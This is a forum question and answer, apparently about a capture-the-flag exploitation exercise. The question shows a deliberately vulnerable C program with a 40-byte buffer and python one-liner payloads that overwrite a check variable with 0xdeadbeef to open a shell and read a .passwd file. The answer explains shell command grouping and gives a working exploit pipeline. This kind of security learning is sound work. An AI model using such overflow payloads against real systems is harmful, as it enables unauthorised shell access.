I'm a newbie in Linux, and exploitation. I have tried to solve some exploitation challenges and I realize some interesting things.
[1](python -c 'print "a"*40 + "\xef\xbe\xad\xde"';cat ) | ./ch13
and
[2]python -c 'print "a"*40 + "\xef\xbe\xad\xde"';cat | ./ch13
When I use I [1] my shellcode work correctly, and it don't work with the other. So, What effective did my shellcode take into program? How different between them?
and the last one,
[3] python -c 'print "a"*40 + "\xef\xbe\xad\xde\0" + " -c \"cat .passwd\""'
I tried passing shellcode -c "cat .passwd"
as a argv to the program. But I got notthings!
Note: This is program code (changed):
int check = 0x04030201;
char buf[40];
fgets(buf,45,stdin);
printf("\n[buf]: %s\n", buf);
printf("[check] %p\n", check);
if ((check != 0x04030201) && (check != 0xdeadbeef))
printf ("UUU\n");
if (check == 0xdeadbeef)
{
printf("Opening your shell...\n");
system("/bin/dash");
}
Thank for reading! Hope to be given documentary..
In the second version, the python
output is not being piped to ./chi13
, it gets printed on the screen. ;
separates commands, so it's equivalent to:
python -c 'print "a"*40 + "\xef\xbe\xad\xde"'
cat | ./ch13
You need to group the two commands to get both of them to write to the pipe. You can do that either by putting them together in a subshell with ()
, or using grouping with {}
:
{ python -c 'print "a"*40 + "\xef\xbe\xad\xde"'; cat; } | ./chi13
User contributions licensed under CC BY-SA 3.0